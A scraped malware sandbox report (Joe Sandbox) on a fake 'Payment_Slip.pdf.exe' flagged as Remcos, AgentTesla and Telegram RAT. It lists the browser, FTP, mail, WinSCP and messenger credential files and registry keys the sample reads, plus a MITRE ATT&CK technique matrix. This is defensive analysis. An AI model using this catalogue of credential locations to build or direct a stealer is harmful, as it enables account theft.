Source: Yara match	File source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		11_2_0040A953
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		17_2_0040A953

Contains functionality to steal Firefox passwords or cookies

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	11_2_0040AA71
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: \key3.db	11_2_0040AA71
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	17_2_0040AA71
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: \key3.db	17_2_0040AA71

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Roaming\host.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\host.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\host.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\host.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\host.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: ESMTPPassword	15_2_004033E2
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	15_2_00402DA5
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	15_2_00402DA5

Yara detected WebBrowserPassView password recovery tool

Source: Yara match

File source: Process Memory Space: Payment_Slip.pdf.exe PID: 6592, type: MEMORYSTR

Source: Yara match	File source: 0000001A.00000002.3620793390.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3619471195.00000000030AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1539307669.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Windows Update.exe PID: 8368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Windows Update.exe PID: 8628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD

Yara detected AgentTesla

Source: Yara match	File source: 12.0.host.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.1218869543.0000000000242000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\host.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Windows Update.exe PID: 8368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Windows Update.exe PID: 8628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Remcos RAT

Source: Yara match	File source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: cmd.exe		11_2_0040567A
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: cmd.exe		17_2_0040567A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	3 OS Credential Dumping	2 System Time Discovery	Remote Services	12 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Native API	1 Windows Service	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	221 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Scheduled Task/Job	1 Windows Service	14 Obfuscated Files or Information	3 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	13 Command and Scripting Interpreter	11 Registry Run Keys / Startup Folder	322 Process Injection	12 Software Packing	3 Credentials In Files	3 File and Directory Discovery	Distributed Component Object Model	221 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	59 System Information Discovery	SSH	4 Clipboard Data	1 Remote Access Software	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	2 Service Execution	RC Scripts	11 Registry Run Keys / Startup Folder	111 Masquerading	Cached Domain Credentials	251 Security Software Discovery	VNC	GUI Input Capture	3 Non-Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	151 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	124 Application Layer Protocol	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	322 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment_Slip.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Threatname: Remcos

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Payment_Slip.pdf.exe